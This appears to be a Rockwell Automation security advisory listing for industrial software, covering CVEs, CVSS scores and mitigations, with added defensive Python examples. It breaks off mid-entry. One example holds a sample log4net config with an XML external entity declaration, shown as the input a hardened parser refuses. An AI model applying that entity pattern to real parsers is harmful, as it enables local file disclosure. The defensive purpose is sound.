
Rockwell Automation Security Advisories

We investigate all internally and externally reported security issues and publish security advisories for all validated security vulnerabilities. These advisories allow our customers and partners to assess the impact of the vulnerabilities and take appropriate action.


We recently relocated all security advisories to this public-facing Security Advisory Portal, which is part of Rockwell Automation’s Trust Center. In the past, our security advisories were stored in the Rockwell Automation Knowledgebase and required authentication to obtain access. This new portal gives customers and partners easier access to advisories, which enables them to better manage the security posture of Rockwell Automation solutions.

Our new Security Advisory Portal includes search and filter functionality, enabling customers to more easily find advisories on their products. Security advisories now include Common Security Advisory Framework 2.0 (CSAF) content, a standard that supports automated security advisory ingestion and helps customers take in vulnerability management data faster. Our security advisories also include Known Exploited Vulnerability (KEV) data: the US Cybersecurity & Infrastructure Security Agency (CISA) maintains the authoritative source of vulnerabilities exploited in the wild and lists them in the KEV catalog. We strongly encourage customers to use this information to prioritize remediation efforts within their vulnerability management processes.
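The ingestion workflow this paragraph describes, as an added example in Python that is not the portal's own tooling: parse a CSAF 2.0 document, match its known_affected products against an asset inventory, flag the CVEs that appear in the KEV catalog, and order the remediation list. The CSAF document, the KEV excerpt, the inventory and the priority bands are constructed assumptions; only the JSON field names follow the published CSAF 2.0 and KEV formats.

```python
import json
from dataclasses import dataclass

# Constructed CSAF 2.0 advisory: sample data in the standard's shape, not a real
# Rockwell Automation advisory. CVE IDs and product names are placeholders.
CSAF_DOC = json.dumps({
    "document": {"category": "csaf_security_advisory", "csaf_version": "2.0",
                 "title": "Example advisory", "tracking": {"id": "EXAMPLE-0001"}},
    "product_tree": {"full_product_names": [
        {"product_id": "CSAFPID-0001", "name": "ExampleSoft 4.02.00"},
        {"product_id": "CSAFPID-0002", "name": "ExampleSoft 5.00.00"},
        {"product_id": "CSAFPID-0003", "name": "OtherSoft 1.0"},
    ]},
    "vulnerabilities": [
        {"cve": "CVE-0000-0001",
         "product_status": {"known_affected": ["CSAFPID-0001"], "fixed": ["CSAFPID-0002"]},
         "scores": [{"products": ["CSAFPID-0001"], "cvss_v3": {
             "version": "3.1", "baseScore": 9.8,
             "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}]},
        {"cve": "CVE-0000-0002",
         "product_status": {"known_affected": ["CSAFPID-0001"]},
         "scores": [{"products": ["CSAFPID-0001"], "cvss_v3": {
             "version": "3.1", "baseScore": 7.1,
             "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"}}]},
        {"cve": "CVE-0000-0003",
         "product_status": {"known_affected": ["CSAFPID-0003"]},
         "scores": [{"products": ["CSAFPID-0003"], "cvss_v3": {
             "version": "3.1", "baseScore": 5.5,
             "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N"}}]},
    ],
})

# Constructed excerpt of a KEV catalog in CISA's JSON shape ("vulnerabilities" /
# "cveID"); only one of the sample CVEs is listed as exploited in the wild.
KEV_CATALOG = json.dumps({"catalogVersion": "example", "vulnerabilities": [
    {"cveID": "CVE-0000-0002", "vendorProject": "Example", "product": "ExampleSoft",
     "dueDate": "2025-01-01"},
]})


@dataclass
class Finding:
    cve: str
    product: str        # installed product the CVE applies to
    base_score: float   # highest CVSS v3 base score covering that product
    in_kev: bool        # listed in the KEV catalog
    fixed_in: str       # product names the advisory marks as fixed
    priority: str


def load_kev_ids(kev_json: str) -> set:
    """Return the set of CVE IDs listed in a KEV catalog JSON document."""
    return {entry["cveID"] for entry in json.loads(kev_json)["vulnerabilities"]}


def priority_band(base_score: float, in_kev: bool) -> str:
    # Example policy, an assumption of this snippet: anything exploited in the
    # wild outranks any score; the rest falls into CVSS base-score bands.
    if in_kev:
        return "P1"
    if base_score >= 9.0:
        return "P2"
    return "P3" if base_score >= 7.0 else "P4"


def prioritize(csaf_json: str, kev_ids: set, inventory: set) -> list:
    """Match a CSAF advisory against an inventory of product names and rank the hits."""
    doc = json.loads(csaf_json)
    names = {p["product_id"]: p["name"] for p in doc["product_tree"]["full_product_names"]}
    installed = {pid for pid, name in names.items() if name in inventory}
    findings = []
    for vuln in doc["vulnerabilities"]:
        status = vuln.get("product_status", {})
        hits = set(status.get("known_affected", [])) & installed
        if not hits:
            continue  # advisory does not touch anything we run
        score = 0.0
        for entry in vuln.get("scores", []):
            if "cvss_v3" in entry and set(entry.get("products", [])) & hits:
                score = max(score, float(entry["cvss_v3"]["baseScore"]))
        in_kev = vuln["cve"] in kev_ids
        fixed_in = ", ".join(names.get(pid, pid) for pid in status.get("fixed", []))
        for pid in sorted(hits):
            findings.append(Finding(vuln["cve"], names[pid], score, in_kev, fixed_in,
                                    priority_band(score, in_kev)))
    # KEV entries first, then by descending base score, then by CVE ID for stability.
    findings.sort(key=lambda f: (not f.in_kev, -f.base_score, f.cve))
    return findings


if __name__ == "__main__":
    for f in prioritize(CSAF_DOC, load_kev_ids(KEV_CATALOG), {"ExampleSoft 4.02.00"}):
        print(f"{f.priority} {f.cve} {f.product} score={f.base_score} kev={f.in_kev} fix={f.fixed_in or '-'}")
```

Run against a real feed, the inventory set would come from an asset management export and the KEV set from CISA's published catalog; the point of the ordering is that a 7.1 already exploited in the wild lands above an unexploited 9.8, which is exactly the prioritization the advisory text recommends.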

These changes support our commitment to security and transparency. The legacy Industrial Security Advisory Index page in the Knowledgebase will remain accessible through mid-2024 to allow customers time to transition to the new portal. Customers will continue to receive email alerts based on their subscription preferences and can subscribe for alerts using the link on the Security Advisory portal.

Critical
SD1728 | Apache Vulnerability in FactoryTalk® Historian-ThingWorx Connection Server
Published Date: May 14, 2025
Last Updated: May 14, 2025
CVE IDs: CVE-2018-1285
CVSS Scores (v3.1): 9.8
CVSS Scores (v4.0): 9.3
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 5/15/2025

Last updated: 5/15/2025

Revision Number: 1.0

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
-----------------|---------------------------------|------------------------------
95057C-FTHTWXCT11 | <= v4.02.00 | v5.00.00 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2018-1285

A vulnerability has been identified in the third-party Apache log4net software, impacting the FactoryTalk® Historian-ThingWorx Connector. This issue arises because versions of Apache log4net prior to 2.0.10 fail to disable XML external entities when parsing log4net configuration files. Consequently, a threat actor could exploit this to launch XXE-based attacks against applications that accept malicious log4net configuration files.
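The hardening that closes this class of issue, as an added example in Python rather than .NET (this is not log4net's code): the configuration parser refuses any DTD, so an external entity can never be declared in the first place. The two configuration samples are constructed, and the file URL in the second one is a placeholder.

```python
import xml.parsers.expat


class UnsafeXmlConfig(ValueError):
    """Raised when a configuration document declares a DTD."""


def parse_appenders(config_text: str) -> list:
    """Return the appender names in a log4net-style config, refusing any DTD.

    External entities can only be declared inside a DOCTYPE, so rejecting the
    DOCTYPE itself (rather than trying to filter entity declarations) is the
    simplest way to close the XXE path for a config file that never needs one.
    """
    parser = xml.parsers.expat.ParserCreate()
    appenders = []

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise UnsafeXmlConfig("DTD not permitted in configuration: %s" % doctype_name)

    def on_start_element(name, attrs):
        if name == "appender" and "name" in attrs:
            appenders.append(attrs["name"])

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start_element
    parser.Parse(config_text, True)  # an exception raised in a handler propagates out of Parse
    return appenders


def config_is_safe(config_text: str) -> bool:
    """True if the config parses without a DTD; False if it was refused."""
    try:
        parse_appenders(config_text)
    except UnsafeXmlConfig:
        return False
    return True


# Constructed sample: an ordinary log4net configuration with two appenders.
SAFE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<log4net>
  <appender name="console" type="log4net.Appender.ConsoleAppender">
    <layout type="log4net.Layout.SimpleLayout" />
  </appender>
  <appender name="rolling" type="log4net.Appender.RollingFileAppender">
    <file value="app.log" />
  </appender>
  <root><level value="INFO" /><appender-ref ref="rolling" /></root>
</log4net>
"""

# Constructed sample of the shape CVE-2018-1285 is about: the same config with a
# DOCTYPE that declares an external entity (placeholder URL) and references it.
UNSAFE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE log4net [ <!ENTITY ext SYSTEM "file:///example/placeholder"> ]>
<log4net>
  <appender name="rolling" type="log4net.Appender.RollingFileAppender">
    <file value="&ext;" />
  </appender>
</log4net>
"""
```

The same rule applies to any XML parser a product feeds untrusted configuration into: if the document format has no legitimate use for a DTD, reject the DOCTYPE outright instead of relying on parser defaults, which differ between libraries and versions.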

 

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Update to the corrected version if possible. Users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

 

High
SD1727 | Local Privilege Escalation and Denial-of-Service Vulnerability in ThinManager®
Published Date: April 15, 2025
Last Updated: April 23, 2025
CVE IDs: CVE-2025-3617, CVE-2025-3618
CVSS Scores (v3.1): 7.8
CVSS Scores (v4.0): 8.5
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
-----------------|-----|---------------------------------|------------------------------
Software - ThinManager | CVE-2025-3617 | 14.0.0 & 14.0.1 | v14.0.2 and later
Software - ThinManager | CVE-2025-3618 | v14.0.1 and earlier | v11.2.11, 12.0.9, 12.1.10, 13.0.7, 13.1.5, 13.2.4, 14.0.2 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Zero Day Initiative (ZDI).

CVE-2025-3617 IMPACT

A privilege escalation vulnerability exists in the affected product. When the software starts up, files are deleted in the temporary folder causing the Access Control Entry of the directory to inherit permissions from the parent directory. If exploited, a threat actor could inherit elevated privileges.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 276 - Incorrect Default Permissions
Known Exploited Vulnerability (KEV) database: No

CVE-2025-3618 IMPACT

A denial-of-service vulnerability exists in the affected product. The software fails to adequately verify the outcome of memory allocation while processing Type 18 messages. If exploited, a threat actor could cause a denial-of-service on the target software.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: 119 - Improper Restriction of Operations within the Bounds of a Memory Buffer
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1726 | Local Code Execution Vulnerabilities in Arena®
Published Date: April 07, 2025
Last Updated: April 07, 2025
CVE IDs: CVE-2025-2285, CVE-2025-2286, CVE-2025-2287, CVE-2025-2288, CVE-2025-2293, CVE-2025-2829, CVE-2025-3285, CVE-2025-3286, CVE-2025-3287, CVE-2025-3288, CVE-2025-3289
CVSS Scores (v3.1): 7.8
CVSS Scores (v4.0): 8.5
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 4/8/2025

Last updated: 4/8/2025

Revision Number: 1.0

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
-----------------|---------------------------------|------------------------------
Arena® | 16.20.08 and earlier | 16.20.09

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Michael Heinzl.

CVE-2025-2285

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-457 Uninitialized Variable

CVE-2025-2286

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-457 Uninitialized Variable

CVE-2025-2287

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-457 Uninitialized Variable

CVE-2025-2288

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-787 Out of Bounds Write

CVE-2025-2293

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-787 Out of Bounds Write

CVE-2025-2829

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-787 Out of Bounds Write

CVE-2025-3285

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-125 Out of Bounds Read

CVE-2025-3286

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-125 Out of Bounds Read

CVE-2025-3287

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-125 Out of Bounds Read

CVE-2025-3288

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-125 Out of Bounds Read

CVE-2025-3289

A local code execution vulnerability exists in the affected products due to a stack-based memory buffer overflow. The flaw is a result of improper validation of user-supplied data. If exploited, a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability, a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No
CWE: CWE-121 Stack-based Buffer Overflow

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

 

High
SD1725 | Third-party Local Code Execution Vulnerability in 440G TLS-Z
Published Date: March 24, 2025
Last Updated: March 24, 2025
CVE IDs: CVE-2020-27212
Products: 440G TLS-Z
CVSS Scores (v3.1): 7.0
CVSS Scores (v4.0): 7.3
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: Yes

Published Date: 3/25/2025

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
-----------------|-------------------|------------------------------
440G TLS-Z | v6.001 | n/a – see mitigations

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Limit physical access to authorized personnel: control room, cells/areas, control panels, and devices. See Chapter 4, Harden the Control System, of the System Security Design Guidelines.
  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-27212 IMPACT

A local code execution vulnerability exists in the STMicroelectronics STM32L4 devices due to having incorrect access controls. The affected product utilizes the STMicroelectronics STM32L4 device and because of the vulnerability, a threat actor could reverse protections that control access to the JTAG interface. If exploited, a threat actor can take over the device.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE: CWE-1395 Dependency of a third-party Component & CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

CPE: cpe:2.3:h:st:stm32l431rc:-:*:*:*:*:*:*:*

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1724 | Lifecycle Services with Veeam Backup and Replication are Vulnerable to third-party Vulnerabilities
Published Date: March 21, 2025
Last Updated: March 21, 2025
CVE IDs: CVE-2025-23120
CVSS Scores (v3.1): 9.9
CVSS Scores (v4.0): 9.4
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: Yes

Published Date: 03/21/25

Last updated: 03/27/25

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Revision
-----------------|-------------------|-------------------------------
Industrial Data Center (IDC) with Veeam | Generations 1 – 5 | Refer to Remediation and Workarounds
VersaVirtual™ Appliance (VVA) with Veeam | Series A - C | Refer to Remediation and Workarounds

REMEDIATIONS AND WORKAROUNDS

Users with an active Rockwell Automation Infrastructure Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without a Rockwell Automation managed services contract, refer to Veeam’s advisories below:

  • Support Content Notification - Support Portal – Veeam support portal
  • https://www.veeam.com/kb4724

Additionally, users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-23120

A remote code execution vulnerability exists in Veeam Backup & Replication, which the affected products use. Exploitation of the vulnerability can allow a threat actor to execute code on the target system.

CVSS 3.1 Base Score: 9.9
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.4
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database: No

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

Critical
SD1723 | Admin Shell Access Vulnerability in Verve Asset Manager
Published Date: March 20, 2025
Last Updated: March 20, 2025
CVE IDs: CVE-2025-1449
CVSS Scores (v3.1): 9.1
CVSS Scores (v4.0): 8.9
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 3/25/25

Revision Number: 1.0

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version(s) | Corrected in Software Revision
-----------------|---------------------|-------------------------------
Verve Asset Manager | <=1.39 | V1.40

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-1449 IMPACT

A vulnerability exists in the affected product due to insufficient variable sanitizing. A portion of the administrative web interface for Verve's Legacy Agentless Device Inventory (ADI) capability (deprecated since the 1.36 release) allows users to change a variable with inadequate sanitizing. If exploited, it could allow a threat actor with administrative access to run arbitrary commands in the context of the container running the service. 
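The control this kind of finding calls for, as an added example in Python (not Verve Asset Manager's code): the administrative variable is validated as one specific type before use, and the command that consumes it is built as an argument vector so no shell ever interprets the value. That the variable names a scan target (hostname or IPv4 address) and the probe command name `adi-probe` are assumptions of the example.

```python
import ipaddress
import re

# One DNS label: 1-63 alphanumerics or hyphens, not starting or ending with a hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_target(value: str) -> bool:
    """True only if value is an IPv4 address or a hostname; any other content is rejected.

    A leading hyphen is refused by the label rule, which also keeps the value
    from being read as an option by the probe command. fullmatch (rather than
    match with $) makes sure a trailing newline cannot slip through.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if labels[-1].isdigit():
        return False  # numeric top-level label: neither a hostname nor a valid address
    return all(_LABEL.fullmatch(label) for label in labels)


def build_inventory_command(target: str) -> list:
    """Return argv for the inventory probe (hypothetical command name, assumed here)."""
    if not is_valid_target(target):
        raise ValueError("target is not a hostname or IPv4 address: %r" % target)
    # An argument vector, never a shell string: the value is one argument and no
    # shell gets a chance to interpret ';', '$(...)', '|' or anything else in it.
    return ["adi-probe", "--host", target]
```

Validating the type positively (what the value must look like) rather than stripping known-bad characters is what CWE-1287 asks for; the argv form is the second, independent layer, and the two together hold even if one of them is later weakened.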

CVSS 3.1 Base Score: 9.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.9
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE: CWE-1287 Improper Validation of Specified Type of Input
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Security Best Practices

Critical
SD1722 | Lifecycle Services with VMware are Vulnerable to third-party Vulnerabilities
Published Date: March 07, 2025
Last Updated: March 07, 2025
CVE IDs: CVE-2025-22224, CVE-2025-22225, CVE-2025-22226
CVSS Scores (v3.1): 9.3, 8.2, 7.1
CVSS Scores (v4.0): 9.4, 9.3, 8.2
Known Exploited Vulnerability (KEV): Yes
Corrected: Yes
Workaround: Yes

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in software version
-----------------|-------------------|------------------------------
Industrial Data Center (IDC) with VMware | Generations 1 – 4 | Refer to Mitigations and Workarounds
VersaVirtual™ Appliance (VVA) with VMware | Series A & B | Refer to Mitigations and Workarounds
Threat Detection Managed Services (TDMS) with VMware | All | Refer to Mitigations and Workarounds
Endpoint Protection Service with RA Proxy & VMware only | All | Refer to Mitigations and Workarounds
Engineered and Integrated Solutions with VMware | All | Refer to Broadcom’s advisory

Remediations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract or Threat Detection Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without a Rockwell Automation managed services contract, refer to Broadcom’s advisories below:

  • Support Content Notification - Support Portal - Broadcom support portal
  • https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u3d-release-notes.html
  • https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u2d-release-notes.html
  • https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-70u3s-release-notes.html

Additionally, users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-22224

